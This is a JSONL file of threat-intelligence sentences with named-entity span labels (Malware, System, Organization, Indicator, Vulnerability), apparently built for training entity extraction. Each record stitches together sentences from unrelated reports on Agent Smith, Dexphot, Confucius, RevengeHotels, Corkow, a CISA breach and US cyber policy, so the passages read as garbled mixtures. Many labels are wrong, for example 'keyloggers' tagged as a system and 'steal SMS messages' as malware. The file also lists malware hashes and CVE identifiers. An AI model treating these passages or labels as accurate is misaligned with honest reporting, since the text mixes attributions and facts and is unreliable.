{"text": "1.6 1.9 Myanmar 234,338 9,729,572 1.5 1.4 1.9 \u201c Agent Smith \u201d Timeline Early signs of activity from the actor behind \u201c Agent Smith \u201d can be traced back to January 2016 . Periodically , the malware tries to contact the Command-and-Control ( C&C ) server with the username encoded into parameters . After a few months of monitoring , we were able to identify around 200 unique Dexphot domains . Per Microsoft \u2019s blog , they have identified additional post - exploitation activities , including : \u2022 Compression of data for exfiltration via 7 - Zip . \u2022 Use of Exchange PowerShell Snap - ins to export mailbox data .", "spans": [{"start": 48, "end": 59, "label": "Malware"}, {"start": 218, "end": 237, "label": "System"}, {"start": 375, "end": 382, "label": "Malware"}, {"start": 397, "end": 409, "label": "Organization"}]}
{"text": "We classify this 40-month period into three main stages . This function is similar to the various versions of backdoors ( such as sctrls and sip_telephone ) that we analyzed in our previous blog post and whitepaper . Dexphot is not the type of attack that generates mainstream media attention ; it \u2019s one of the countless malware campaigns that are active at any given time . \u2022 Use of additional offensive security tools Covenant , Nishang , and PowerCat for remote access .", "spans": [{"start": 130, "end": 136, "label": "System"}, {"start": 141, "end": 154, "label": "System"}, {"start": 217, "end": 224, "label": "Malware"}]}
{"text": "January 2016 \u2013 May 2018 : In this stage , \u201c Agent Smith \u201d hackers started to try out 9Apps as a distribution channel for their adware . This algorithm was previously discussed by security researchers in a Confucius-related blog post . Its goal is a very common one in cybercriminal circles \u2014 to install a coin miner that silently steals computer resources and generates revenue for the attackers \u2014 yet Dexphot exemplifies the level of complexity and rate of evolution of even everyday threats , intent on evading protections and motivated to fly under the radar for the prospect of profit . The activity we have observed , coupled with others in the information security industry , indicate that these threat actors are likely using Exchange Server vulnerabilities to gain a foothold into environments .", "spans": [{"start": 44, "end": 55, "label": "Malware"}, {"start": 402, "end": 409, "label": "Malware"}, {"start": 702, "end": 715, "label": "Organization"}, {"start": 720, "end": 801, "label": "Indicator"}]}
{"text": "During this period , malware samples display some typical adware characteristics such as unnecessary permission requirements and pop-up windows . Lately , Patchwork has been sending multiple RTF files exploiting CVE-2017-8570 . To combat threats , several next-generation protection engines in Microsoft Defender Advanced Threat Protection \u2019s antivirus component detect and stop malicious techniques at multiple points along the attack chain . This activity is followed quickly by additional access and persistent mechanisms .", "spans": [{"start": 136, "end": 143, "label": "System"}, {"start": 155, "end": 164, "label": "Organization"}, {"start": 191, "end": 200, "label": "Malware"}, {"start": 212, "end": 225, "label": "Vulnerability"}, {"start": 294, "end": 339, "label": "System"}, {"start": 343, "end": 362, "label": "System"}]}
{"text": "During this time , \u201c Agent Smith \u201d hackers eventually built up a vast number of app presence on 9Apps , which later would serve as publication channels for evolved droppers . The group still uses the Badnews malware , a backdoor with information-stealing and file-executing capabilities , albeit updated with a slight modification in the encryption routine at the end of 2017 , when they added Blowfish encryption on top of their custom encryption described in our former Patchwork blogpost . For Dexphot , machine learning-based detections in the cloud recognize and block the DLLs loaded by rundll32.exe , stopping the attack chain in its early stages . We recommend checking the following for potential evidence of compromise : \u2022 Child processes of on Exchange Servers , particularly .", "spans": [{"start": 21, "end": 32, "label": "Malware"}, {"start": 96, "end": 101, "label": "System"}, {"start": 200, "end": 215, "label": "System"}, {"start": 472, "end": 481, "label": "Organization"}, {"start": 497, "end": 504, "label": "Malware"}, {"start": 578, "end": 582, "label": "System"}, {"start": 593, "end": 605, "label": "Indicator"}]}
{"text": "However , samples don \u2019 t have key capabilities to infect innocent apps on victim devices yet . Threat actors like Confucius and Patchwork are known for their large arsenal of tools and ever-evolving techniques that can render traditional security solutions \u2014 which are often not designed to handle the persistent and sophisticated threats detailed in this blog \u2014 ineffective . Memory scans detect and terminate the loading of malicious code hidden by process hollowing \u2014 including the monitoring processes that attempt to update the malware code and re-infect the machine via PowerShell commands . \u2022 New , unexpected compiled ASPX files in the directory \u2022 Reconnaissance , vulnerability - testing requests to the following resources from an external IP address : In our investigations to date , the web shells placed on Exchange Servers have been named differently in each intrusion , and thus the file name alone is not a high - fidelity indicator of compromise .", "spans": [{"start": 115, "end": 124, "label": "Organization"}, {"start": 129, "end": 138, "label": "Organization"}, {"start": 452, "end": 469, "label": "System"}, {"start": 577, "end": 587, "label": "System"}, {"start": 657, "end": 761, "label": "Indicator"}, {"start": 821, "end": 837, "label": "System"}, {"start": 854, "end": 963, "label": "Indicator"}]}
{"text": "May 2018 to April 2019 : This is the actual mature stage of \u201c Agent Smith \u201d campaign . The reality is that IT departments of small to large-sized organizations are not equipped to handle the more advanced threats that groups like Confucius use in their attacks . Behavioral blocking and containment capabilities are especially effective in defeating Dexphot \u2019s fileless techniques , detection evasion , and persistence mechanisms , including the periodic and boot-time attempts to update the malware via scheduled tasks . If you believe your Exchange Server was compromised , we recommend investigating to determine the scope of the attack and dwell time of the threat actor .", "spans": [{"start": 62, "end": 73, "label": "Malware"}, {"start": 107, "end": 121, "label": "Organization"}, {"start": 350, "end": 357, "label": "Malware"}, {"start": 542, "end": 557, "label": "System"}]}
{"text": "From early 2018 prior to May , \u201c Agent Smith \u201d hackers started to experiment with Bundle Feng Shui , the key tool which gives \u201c Agent Smith \u201d malware family capabilities to infect innocent apps on the device . Patchwork uses email as an entry point , which is why securing the email gateway is important . As mentioned , given the complexity of the attack chain and of Dexphot \u2019s persistence methods , we released a remediation solution that prevents re-infection by removing artifacts . Furthermore , as system and web server logs may have time or size limits enforced , we recommend preserving the following artifacts for forensic analysis : \u2022 At least 14 days of HTTP web logs from the directories ( include logs from all subdirectories ) \u2022", "spans": [{"start": 33, "end": 44, "label": "Malware"}, {"start": 128, "end": 139, "label": "Malware"}, {"start": 210, "end": 219, "label": "Organization"}, {"start": 369, "end": 376, "label": "Malware"}, {"start": 505, "end": 531, "label": "System"}]}
{"text": "A series of pilot runs were executed . This blog post examines two similar malware families that utilize the aforementioned technique to abuse legitimate websites , their connections to each other , and their connections to known espionage campaigns . The detection , blocking , and remediation of Dexphot on endpoints are exposed in Microsoft Defender Security Center , where Microsoft Defender ATP \u2019s rich capabilities like endpoint detection and response , automated investigation and remediation , and others enable security operations teams to investigate and remediate attacks in enterprise environments . The contents of the Exchange Web Server ( also found within the folder ) \u2022 At least 14 days of Exchange Control Panel ( ECP ) logs , located in We have found significant hunting and analysis value in these log folders , especially for suspicious CMD parameters in the ECP Server logs .", "spans": [{"start": 298, "end": 305, "label": "Malware"}, {"start": 334, "end": 368, "label": "System"}, {"start": 377, "end": 399, "label": "System"}, {"start": 632, "end": 651, "label": "System"}, {"start": 707, "end": 742, "label": "System"}, {"start": 880, "end": 895, "label": "System"}]}
{"text": "After some major upgrade , by mid-June , the \u201c Agent Smith \u201d campaign reached its peak . In order to increase the likelihood of their malware successfully communicating home , cyber espionage threat actors are increasingly abusing legitimate web services , in lieu of DNS lookups to retrieve a command and control address . With these capabilities , Microsoft Defender ATP provides comprehensive protection against Dexphot and the countless other complex and evolving threats that we face every day . To increase investigation transparency , we are including a Last Known True , or LKT , value for network indicators .", "spans": [{"start": 47, "end": 58, "label": "Malware"}, {"start": 350, "end": 372, "label": "System"}, {"start": 415, "end": 422, "label": "Malware"}, {"start": 561, "end": 616, "label": "Indicator"}]}
{"text": "Its dropper family finished integration with Bundle Feng Shui and campaign C & C infrastructure was shifted to AWS cloud . In 2013 , Rapid7 reported on a series of relatively amateur attacks against Pakistani targets . Dexphot : 72acaf9ff8a43c68416884a3fff3b23e749b4bb8fb39e16f9976643360ed391f . FireEye detects this activity across our platforms .", "spans": [{"start": 111, "end": 114, "label": "System"}, {"start": 133, "end": 139, "label": "Organization"}, {"start": 219, "end": 226, "label": "Malware"}, {"start": 229, "end": 293, "label": "Indicator"}, {"start": 296, "end": 303, "label": "Organization"}]}
{"text": "The Campaign achieved exponential growth from June to December 2018 with the infection number staying stable into early 2019 . The first of which we call ' CONFUCIUS_A ' , a malware family that has links to a series of attacks associated with a backdoor attack method commonly known as SNEEPY ( aka ByeByeShell ) first reported by Rapid7 in 2013 . Dexphot : 22beffb61cbdc2e0c3eefaf068b498b63a193b239500dab25d03790c467379e3 . The following contains specific detection names that provide an indicator of Exchange Server exploitation or post - exploitation activities we associated with these threat actors .", "spans": [{"start": 156, "end": 167, "label": "Malware"}, {"start": 286, "end": 292, "label": "System"}, {"start": 299, "end": 310, "label": "System"}, {"start": 331, "end": 337, "label": "Organization"}, {"start": 348, "end": 355, "label": "Malware"}, {"start": 358, "end": 422, "label": "Indicator"}, {"start": 502, "end": 517, "label": "System"}]}
{"text": "Post-April 2019 : Starting from early 2019 , the new infection rate of \u201c Agent Smith \u201d dropped significantly . At first glance CONFUCIUS_B looks very similar to CONFUCIUS_A , and they are also packaged in plain SFX binary files . Dexphot : 65eac7f9b67ff69cefed288f563b4d77917c94c410c6c6c4e4390db66305ca2a . Last week , the Biden administration released its formal roadmap for its national cybersecurity initiative meant to encourage greater investment in cybersecurity and strengthen the U.S. \u2019s critical infrastructure security ( and more ) .", "spans": [{"start": 73, "end": 84, "label": "Malware"}, {"start": 127, "end": 138, "label": "Malware"}, {"start": 161, "end": 172, "label": "Malware"}, {"start": 211, "end": 227, "label": "System"}, {"start": 230, "end": 237, "label": "Malware"}, {"start": 240, "end": 304, "label": "Indicator"}, {"start": 323, "end": 343, "label": "Organization"}]}
{"text": "From early April , hackers started to build a new major update to the \u201c Agent Smith \u201d campaign under the name \u201c leechsdk \u201d . The CONFUCIUS_B executable is disguised as a PowerPoint presentation , using a Right-To-Left-Override ( RTLO ) trick and a false icon . Dexphot : ba9467e0d63ba65bf10650a3c8d36cd292b3f846983032a44a835e5966bc7e88 . Republican state lawmakers are backing a legal challenge in the court systems to block an Environmental Protection Administration rule that asked local water systems to evaluate their current cybersecurity systems and protections while conducting sanitation surveys .", "spans": [{"start": 72, "end": 83, "label": "Malware"}, {"start": 129, "end": 140, "label": "Malware"}, {"start": 155, "end": 193, "label": "Malware"}, {"start": 196, "end": 226, "label": "Malware"}, {"start": 229, "end": 233, "label": "System"}, {"start": 248, "end": 258, "label": "Malware"}, {"start": 261, "end": 268, "label": "Malware"}, {"start": 271, "end": 335, "label": "Indicator"}, {"start": 338, "end": 364, "label": "Organization"}, {"start": 428, "end": 467, "label": "Organization"}]}
{"text": "Figure 26 : \u201c Agent Smith \u201d Campaign timeline Greater \u201c Agent Smith \u201d Campaign Discovery Orchestrating a successful 9Apps centric malware campaign , the actor behind \u201c Agent Smith \u201d established solid strategies in malware proliferation and payload delivery . We also believe that both clusters of activity have links to attacks with likely Indian origins , the CONFUCIUS_A attacks are linked to the use of SNEEPY/BYEBYESHELL and the CONFUCIUS_B have a loose link to Hangover . Dexphot : 537d7fe3b426827e40bbdd1d127ddb59effe1e9b3c160804df8922f92e0b366e . To me , simply asking critical infrastructure to consider these factors as part of their normal processes seems like a non - issue , but the U.S. Appeals Court has put a hold on this rule for the time being ( though it did n\u2019t give a precise reason at the time of its ruling ) .", "spans": [{"start": 14, "end": 25, "label": "Malware"}, {"start": 56, "end": 67, "label": "Malware"}, {"start": 116, "end": 121, "label": "System"}, {"start": 168, "end": 179, "label": "Malware"}, {"start": 406, "end": 424, "label": "System"}, {"start": 433, "end": 444, "label": "Malware"}, {"start": 466, "end": 474, "label": "System"}, {"start": 477, "end": 484, "label": "Malware"}, {"start": 487, "end": 551, "label": "Indicator"}, {"start": 576, "end": 599, "label": "Organization"}, {"start": 695, "end": 713, "label": "Organization"}]}
{"text": "The actor also built solid backend infrastructures which can handle high volume concurrent requests . The two malware families themselves are also very similar , and therefore we think that the shared technique is an indication of a single developer , or development company , behind both CONFUCIUS_A and CONFUCIUS_B . Dexphot : 504cc403e0b83233f8d20c0c86b0611facc040b868964b4afbda3214a2c8e1c5 . Two leading Republican members of the U.S. House came out hours after the Biden administration released the roadmap , saying they would use their respective House panels to , \u201c exercise strict oversight on CISA \u2019s efforts \u201d to implement many of the policies outlined .", "spans": [{"start": 255, "end": 274, "label": "Organization"}, {"start": 289, "end": 300, "label": "Malware"}, {"start": 305, "end": 316, "label": "Malware"}, {"start": 319, "end": 326, "label": "Malware"}, {"start": 329, "end": 393, "label": "Indicator"}, {"start": 434, "end": 444, "label": "Organization"}, {"start": 470, "end": 490, "label": "Organization"}, {"start": 553, "end": 565, "label": "Organization"}]}
{"text": "During our extended threat hunting , we uncovered 11 apps on the Google Play store that contain a malicious yet dormant SDK related to \u201c Agent Smith \u201d actor . In this blog post , we discussed two separate malware variations that behave in very similar ways and use similar techniques to acquire a C2 address , with both using Yahoo Answers and Quora to evade traditional mechanisms for blocking command and control domains . Dexphot : aa5c56fe01af091f07c56ac7cbd240948ea6482b6146e0d3848d450977dff152 . Regardless of which side of the political spectrum you fall , cybersecurity should be something our lawmakers can all agree on .", "spans": [{"start": 65, "end": 82, "label": "System"}, {"start": 137, "end": 148, "label": "Malware"}, {"start": 425, "end": 432, "label": "Malware"}, {"start": 435, "end": 499, "label": "Indicator"}, {"start": 602, "end": 611, "label": "Organization"}]}
{"text": "This discovery indicates the actor \u2019 s ambition in expanding operations into Google Play store with previous success experience from the main \u201c Agent Smith \u201d campaign . The Android version , for instance , can steal SMS messages , accounts , contacts , and files , as well as record audio . RevengeHotels : cybercrime targeting hotel front desks worldwide . Say these arguments extend through the 2024 election \u2014 what happens if control of the White House or Congress switches between parties ?", "spans": [{"start": 77, "end": 88, "label": "System"}, {"start": 144, "end": 155, "label": "Malware"}, {"start": 173, "end": 188, "label": "Malware"}, {"start": 210, "end": 228, "label": "Malware"}, {"start": 231, "end": 239, "label": "Malware"}, {"start": 242, "end": 250, "label": "Malware"}, {"start": 257, "end": 262, "label": "Malware"}, {"start": 276, "end": 288, "label": "Malware"}, {"start": 291, "end": 304, "label": "Organization"}, {"start": 444, "end": 455, "label": "Organization"}]}
{"text": "Instead of embedding core malware payload in droppers , the actor switches to a more low-key SDK approach . Confucius' backdoors are delivered through Office documents exploiting memory corruption vulnerabilities CVE-2015-1641 and CVE-2017-11882 . RevengeHotels is a targeted cybercrime malware campaign against hotels , hostels , hospitality and tourism companies , mainly , but not exclusively , located in Brazil . Our researchers recently discovered a threat actor conducting several campaigns against government entities , military organizations and civilian users in Ukraine and Poland .", "spans": [{"start": 108, "end": 118, "label": "System"}, {"start": 213, "end": 226, "label": "Vulnerability"}, {"start": 231, "end": 245, "label": "Vulnerability"}, {"start": 248, "end": 261, "label": "Organization"}, {"start": 480, "end": 497, "label": "Organization"}, {"start": 506, "end": 525, "label": "Organization"}, {"start": 528, "end": 550, "label": "Organization"}, {"start": 555, "end": 569, "label": "Organization"}]}
{"text": "In the dangerous module lies a kill switch logic which looks for the keyword \u201c infect \u201d . We dove deeper into Confucius' operations\u2014namely , the malware-ridden documents , backdoors , and file stealers they use in their campaigns . We have confirmed more than 20 hotels that are victims of the group , located in eight states in Brazil , but also in other countries such as Argentina , Bolivia , Chile , Costa Rica , France , Italy , Mexico , Portugal , Spain , Thailand and Turkey . Our recent reporting states that these operations are very likely aimed at stealing information and gaining persistent remote access .", "spans": []}
{"text": "Once the keyword is present , the SDK will switch from innocent ads server to malicious payload delivery ones . The sctrls backdoor we came across is delivered via RTF files exploiting CVE-2015-1641 . The goal of the campaign is to capture credit card data from guests and travelers stored in hotel systems , as well as credit card data received from popular online travel agencies ( OTAs ) such as Booking.com . The final payloads include the AgentTesla remote access trojan ( RAT ) , Cobalt Strike beacons and njRAT .", "spans": [{"start": 116, "end": 131, "label": "System"}, {"start": 185, "end": 198, "label": "Vulnerability"}, {"start": 359, "end": 381, "label": "Organization"}, {"start": 384, "end": 388, "label": "Organization"}, {"start": 399, "end": 410, "label": "Indicator"}, {"start": 444, "end": 481, "label": "Malware"}, {"start": 486, "end": 499, "label": "System"}, {"start": 512, "end": 517, "label": "System"}]}
{"text": "Hence , we name this new spin-off campaign as Jaguar Kill Switch . The documents that exploit CVE2017-11882 download another payload \u2014 an HTML Application ( HTA ) file toting a malicious Visual Basic ( VBS ) script \u2014 from the server , which is executed accordingly by the command-line tool mshta.exe . The main attack vector is via email with crafted Word , Excel or PDF documents attached . If you \u2019re a user in Ukraine or Poland , especially someone working in the government or military sectors , this is a clear - cut example of a spam campaign targeting this population .", "spans": [{"start": 94, "end": 107, "label": "Vulnerability"}, {"start": 138, "end": 154, "label": "System"}, {"start": 157, "end": 160, "label": "Malware"}, {"start": 290, "end": 299, "label": "Malware"}, {"start": 463, "end": 477, "label": "Organization"}, {"start": 481, "end": 497, "label": "Organization"}, {"start": 535, "end": 548, "label": "Organization"}]}
{"text": "The below code snippet is currently isolated and dormant . In August 2015 a new incident related to the Corkow ( Metel ) Trojan was detected . Some of them exploit CVE-2017-0199 , loading it using VBS and PowerShell scripts and then installing customized versions of RevengeRAT , NjRAT , NanoCoreRAT , 888 RAT and other custom malware such as ProCC in the victim \u2019s machine . For those who fall outside of that demographic , it \u2019s interesting that this group is still relying on the user enabling macros in Office , since Microsoft disabled those by default earlier this year .", "spans": [{"start": 104, "end": 110, "label": "System"}, {"start": 113, "end": 118, "label": "Organization"}, {"start": 164, "end": 177, "label": "Vulnerability"}, {"start": 205, "end": 215, "label": "System"}, {"start": 267, "end": 277, "label": "Malware"}, {"start": 280, "end": 285, "label": "Malware"}, {"start": 288, "end": 299, "label": "Malware"}, {"start": 302, "end": 309, "label": "Malware"}, {"start": 343, "end": 348, "label": "Malware"}, {"start": 522, "end": 531, "label": "System"}]}
{"text": "In the future , it will be invoked by malicious SDK during banner ads display . Corkow provided remote access to the ITS-Broker system terminal by \u300a Platforma soft \u300b Ltd , which enabled the fraud to be committed . The group has been active since 2015 , but increased its attacks in 2019 . These are also highly targeted emails with ( relatively speaking ) convincing lures , so whoever is behind these is not to be ignored .", "spans": [{"start": 80, "end": 86, "label": "System"}, {"start": 320, "end": 326, "label": "Organization"}]}
{"text": "Figure 26 : the kill switch code snippet Evidence implies that the \u201c Agent Smith \u201d actor is currently laying the groundwork , increasing its Google Play penetration rate and waiting for the right timing to kick off attacks . According to our statistics , as of the beginning of 2015 this botnet encompassed over 250 000 infected devices worldwide including infecting more than 100 financial institutions with 80% of them from the top 20 list . In our research , we were also able to track two groups targeting the hospitality sector , using separate but similar infrastructure , tools and techniques . There are multiple Cisco Secure protections in place to defend against the types of spam used in these campaigns .", "spans": [{"start": 69, "end": 80, "label": "Malware"}, {"start": 141, "end": 152, "label": "System"}, {"start": 288, "end": 306, "label": "Malware"}, {"start": 381, "end": 403, "label": "Organization"}, {"start": 621, "end": 645, "label": "System"}, {"start": 673, "end": 690, "label": "Organization"}, {"start": 705, "end": 714, "label": "Organization"}]}
{"text": "By the time of this publication , two Jaguar Kill Switch infected app has reached 10 million downloads while others are still in their early stages . The interest among hackers in targeting trading systems is expected to grow . PaloAlto has already written about one of them . Other Snort rules and detection content can prevent the execution of the malware used as the final payload .", "spans": [{"start": 228, "end": 236, "label": "Organization"}]}
{"text": "Check Point Research reported these dangerous apps to Google upon discovery . Russian-speaking hackers are believed to be responsible for these attacks and used the Corkow Trojan . We named the first group RevengeHotels , and the second ProCC . Chinese state - sponsored actors reportedly accessed email accounts belonging to several U.S.-based organizations and federal government agencies , including the State Department .", "spans": [{"start": 0, "end": 11, "label": "Organization"}, {"start": 54, "end": 60, "label": "Organization"}, {"start": 165, "end": 178, "label": "System"}, {"start": 206, "end": 219, "label": "Organization"}, {"start": 237, "end": 242, "label": "Organization"}, {"start": 245, "end": 277, "label": "Organization"}, {"start": 334, "end": 358, "label": "Organization"}, {"start": 363, "end": 390, "label": "Organization"}, {"start": 407, "end": 423, "label": "Organization"}]}
{"text": "Currently , all bespoke apps have been taken down from the Google Play store . Hackers target primarily companies in Russia and CIS countries , though it is noticed that the amount of attacks targeting the USA has increased 5 times since 2011 . These groups use a lot of social engineering in their attacks , asking for a quote from what appears to be a government entity or private company wanting to make a reservation for a large number of people . The U.S. Cybersecurity and Infrastructure Security Agency ( CISA ) released a detailed timeline on the campaign , stating that an investigation from Microsoft revealed that \u201c advanced persistent threat ( APT ) actors accessed and exfiltrated unclassified Exchange Online Outlook data \u201d after users reported suspicious activities in their Microsoft 365 cloud environment .", "spans": [{"start": 59, "end": 70, "label": "System"}, {"start": 94, "end": 113, "label": "Organization"}, {"start": 456, "end": 518, "label": "Organization"}, {"start": 551, "end": 563, "label": "Organization"}, {"start": 601, "end": 610, "label": "Organization"}, {"start": 627, "end": 668, "label": "Organization"}, {"start": 669, "end": 780, "label": "Indicator"}, {"start": 790, "end": 821, "label": "System"}]}
{"text": "Figure 28 : Jaguar Kill Switch infected GP apps Peek Into the Actor Based on all of the above , we connected \u201c Agent Smith \u201d campaign to a Chinese internet company located in Guangzhou whose front end legitimate business is to help Chinese Android developers publish and promote their apps on overseas platforms . One of the first botnets specializing in targeting the trading software called Quik was \" Ranbyus \" , created in 2012 . Their infrastructure also relies on the use of dynamic DNS services pointing to commercial hosting and self-hosted servers . While the full scope of the hack is still under investigation , reports indicate that the actors were primarily trying to steal sensitive information .", "spans": [{"start": 111, "end": 122, "label": "Malware"}, {"start": 240, "end": 247, "label": "System"}, {"start": 393, "end": 397, "label": "System"}, {"start": 404, "end": 411, "label": "System"}, {"start": 489, "end": 492, "label": "Indicator"}]}
{"text": "Various recruitment posts on Chinese job sites and Chinese National Enterprise Credit Information Public System ( NECIPS ) data led us one step further , linking the actor to its legal entity name . As of the Group-IB investigation of this malware program in March 2015 , Corkow v.7.118.1.1 had not been detected by a single antivirus program . They also sell credentials from the affected systems , allowing other cybercriminals to have remote access to hotel front desks infected by the campaign . While CISA or Microsoft have yet to disclose any specific vulnerabilities the actors exploited , the CISA report does say that the APT used a Microsoft account consumer key to forge tokens and impersonate targeted users .", "spans": [{"start": 51, "end": 122, "label": "System"}, {"start": 209, "end": 217, "label": "Organization"}, {"start": 272, "end": 278, "label": "System"}, {"start": 506, "end": 510, "label": "Organization"}, {"start": 514, "end": 523, "label": "Organization"}, {"start": 601, "end": 612, "label": "Organization"}, {"start": 631, "end": 634, "label": "Organization"}]}
{"text": "Interestingly , we uncovered several expired job posting of Android reverse engineer from the actor \u2019 s front business published in 2018 and 2019 . Hackers gained access to a computer in the trading system in September 2014 . We monitored the activities of these groups and the new malware they are creating for over a year . \u201c Microsoft remediated the issue by first blocking tokens issued with the acquired key and then replacing the key to prevent continued misuse , \u201d the report states .", "spans": [{"start": 60, "end": 67, "label": "System"}, {"start": 328, "end": 337, "label": "System"}]}
{"text": "It seems that the people who filled these roles are key to \u201c Agent Smith \u2019 s success , yet not quite necessary for actor \u2019 s legitimate side of business . Starting in December 2014 , the criminal group began running keyloggers in the infected system . With a high degree of confidence , we can confirm that at least two distinct groups are focused on attacking this sector ; there is also a third group , though it is unclear if its focus is solely on this sector or if carries out other types of attacks . ( CISA , CNN )", "spans": [{"start": 61, "end": 72, "label": "Malware"}, {"start": 216, "end": 226, "label": "System"}, {"start": 509, "end": 513, "label": "Organization"}, {"start": 516, "end": 519, "label": "Organization"}]}
{"text": "With a better understanding of the \u201c Agent Smith \u201d actor than we had in the initial phase of campaign hunting , we examined the list of target innocent apps once again and discovered the actor \u2019 s unusual practices in choosing targets . To spread the Corkow malware criminals use a drive-by downloads method , when victims are infected while visiting compromised legitimate websites . One of the tactics used in operations by these groups is highly targeted spear-phishing messages . Popular tax preparation software companies are under fire from lawmakers for allegedly sharing personal information with social media sites , including Google and Meta .", "spans": [{"start": 37, "end": 48, "label": "Malware"}, {"start": 484, "end": 526, "label": "Organization"}, {"start": 547, "end": 556, "label": "Organization"}, {"start": 636, "end": 642, "label": "System"}, {"start": 647, "end": 651, "label": "System"}]}
{"text": "It seems , \u201c Agent Smith \u201d prey list does not only have popular yet Janus vulnerable apps to ensure high proliferation , but also contain competitor apps of actor \u2019 s legitimate business arm to suppress competition . Group-IB specialists detected various sites used by criminals to spread the Trojan : mail tracking websites , news portals , electronic books , computer graphics resources , music portals , etc . They register typo-squatting domains , impersonating legitimate companies . Several Democratic lawmakers released a report last week that accused TaxAct , H&R Block and TaxSlayer of embedding Meta and Google \u2019s tracking pixels on their sites , potentially violating U.S. law and sharing taxpayers \u2019 information with those companies .", "spans": [{"start": 13, "end": 24, "label": "Malware"}, {"start": 68, "end": 73, "label": "Vulnerability"}, {"start": 217, "end": 225, "label": "Organization"}, {"start": 302, "end": 324, "label": "System"}, {"start": 327, "end": 339, "label": "System"}, {"start": 342, "end": 358, "label": "System"}, {"start": 361, "end": 388, "label": "System"}, {"start": 391, "end": 404, "label": "System"}, {"start": 497, "end": 517, "label": "Organization"}, {"start": 559, "end": 565, "label": "Organization"}, {"start": 568, "end": 577, "label": "Organization"}, {"start": 582, "end": 591, "label": "System"}, {"start": 605, "end": 609, "label": "Organization"}, {"start": 614, "end": 639, "label": "Organization"}, {"start": 649, "end": 654, "label": "System"}]}
{"text": "Conclusion Although the actor behind \u201c Agent Smith \u201d decided to make their illegally acquired profit by exploiting the use of ads , another actor could easily take a more intrusive and harmful route . Hackers use the exploits \" Nitris Exploit Kit \" ( earlier known as CottonCastle ) , which is not available in open sources and sold only to trusted users . The emails are well written , with an abundance of detail . The report says the data was kept anonymous , but the companies could \u201c easily \u201d use the information to identify individuals or create targeted advertising for them .", "spans": [{"start": 39, "end": 50, "label": "Malware"}, {"start": 228, "end": 246, "label": "Vulnerability"}, {"start": 268, "end": 280, "label": "Vulnerability"}, {"start": 361, "end": 367, "label": "System"}]}
{"text": "With the ability to hide its icon from the launcher and hijack popular existing apps on a device , there are endless possibilities to harm a user \u2019 s digital even physical security . Group-IB Bot-trek TDS sensors are in place at a number of financial institutions and , unfortunately , we register that currently Corkow malware is present on 80% of protected corporate systems . They explain why the company has chosen to book that particular hotel . ( Vox , USA Today )", "spans": [{"start": 183, "end": 191, "label": "Organization"}, {"start": 241, "end": 263, "label": "Organization"}, {"start": 313, "end": 327, "label": "System"}, {"start": 453, "end": 456, "label": "Organization"}, {"start": 459, "end": 468, "label": "Organization"}]}
{"text": "Today this malware shows unwanted ads , tomorrow it could steal sensitive information ; from private messages to banking credentials and much more . Considering the Trojan delivery method and through our analysis of infections on banks' networks , we can confirm that all infections were conducted on a random basis . By checking the sender information , it \u2019s possible to determine whether the company actually exists . Apple had to roll back and then re - release a security update that addressed an actively exploited vulnerability in WebKit .", "spans": [{"start": 421, "end": 426, "label": "Organization"}, {"start": 511, "end": 534, "label": "Vulnerability"}, {"start": 538, "end": 544, "label": "Organization"}]}
{"text": "The \u201c Agent Smith \u201d campaign serves as a sharp reminder that effort from system developers alone is not enough to build a secure Android eco-system . According to statistics , Corkow primarily targets users in Russia and the CIS , but it is worth noting that in 2014 the amount of attacks targeting the USA increased by 5 times , in comparison with 2011 . However , there is a small difference between the domain used to send the email and the real one . Apple initially released a Rapid Security Response patch for iPhones and iPads on July 11 to fix CVE-2023 - 37450 , a remote code execution vulnerability in the WebKit browser engine that Safari and other web browsers use .", "spans": [{"start": 6, "end": 17, "label": "Malware"}, {"start": 129, "end": 136, "label": "System"}, {"start": 176, "end": 182, "label": "System"}, {"start": 201, "end": 206, "label": "Organization"}, {"start": 430, "end": 435, "label": "System"}, {"start": 455, "end": 460, "label": "Organization"}, {"start": 516, "end": 523, "label": "System"}, {"start": 528, "end": 533, "label": "System"}, {"start": 552, "end": 568, "label": "Vulnerability"}, {"start": 612, "end": 630, "label": "System"}, {"start": 643, "end": 649, "label": "System"}, {"start": 660, "end": 672, "label": "System"}]}
{"text": "It requires attention and action from system developers , device manufacturers , app developers , and users , so that vulnerability fixes are patched , distributed , adopted and installed in time . Moreover , the number of Corkow incidents detected in Q1 2015 in the United States exceeds the number of those in the CIS countries . This spear-phishing message , written in Portuguese , has a malicious file attached misusing the name of a real attorney office , while the domain sender of the message was registered one day before , using a typo-squatting domain . However , users reported that the fix was causing Safari to not connect correctly to major websites like Facebook , Instagram and Zoom , leading Apple to pull back the patch .", "spans": [{"start": 223, "end": 229, "label": "System"}, {"start": 615, "end": 621, "label": "System"}, {"start": 670, "end": 678, "label": "System"}, {"start": 681, "end": 690, "label": "System"}, {"start": 695, "end": 699, "label": "System"}, {"start": 710, "end": 715, "label": "Organization"}]}
{"text": "It is also another example for why organizations and consumers alike should have an advanced mobile threat prevention solution installed on the device to protect themselves against the possibility of unknowingly installing malicious apps , even from trusted app stores . Moreover , the number of Corkow incidents detected in Q1 2015 in the United States exceeds the number of those in the CIS countries . The group goes further in its social engineering effort : to convince the hotel personnel about the legitimacy of their request , a copy of the National Registry of Legal Entities card ( CNPJ ) is attached to the quotation . Since then , Apple released a new fix for iOS , iPadOS and macOS that reliably fixes the vulnerability again .", "spans": [{"start": 296, "end": 302, "label": "System"}, {"start": 643, "end": 648, "label": "Organization"}, {"start": 672, "end": 675, "label": "System"}, {"start": 678, "end": 684, "label": "System"}, {"start": 689, "end": 694, "label": "System"}]}
{"text": "Dvmap : the first Android malware with code injection 08 JUN 2017 In April 2017 we started observing new rooting malware being distributed through the Google Play Store . Hackers first actively spread bots using the Niteris exploit , and then search for infected devices at banks amongst their bots by analyzing IP addresses , cracked passwords and results of the modules performance . The attached file , Reserva Advogados Associados.docx ( Attorneys Associates Reservation.docx ) , is a malicious Word file that drops a remote OLE object via template injection to execute macro code . Though few details are currently available about CVE-2023 - 37450 , Apple indicated it had been exploited in the wild and could be triggered by a vulnerable browser processing specially crafted web content .", "spans": [{"start": 0, "end": 5, "label": "Malware"}, {"start": 18, "end": 25, "label": "System"}, {"start": 151, "end": 168, "label": "System"}, {"start": 216, "end": 231, "label": "Vulnerability"}, {"start": 274, "end": 279, "label": "Organization"}, {"start": 406, "end": 439, "label": "Indicator"}, {"start": 442, "end": 479, "label": "Indicator"}, {"start": 529, "end": 532, "label": "System"}, {"start": 636, "end": 652, "label": "Vulnerability"}, {"start": 683, "end": 792, "label": "Indicator"}]}
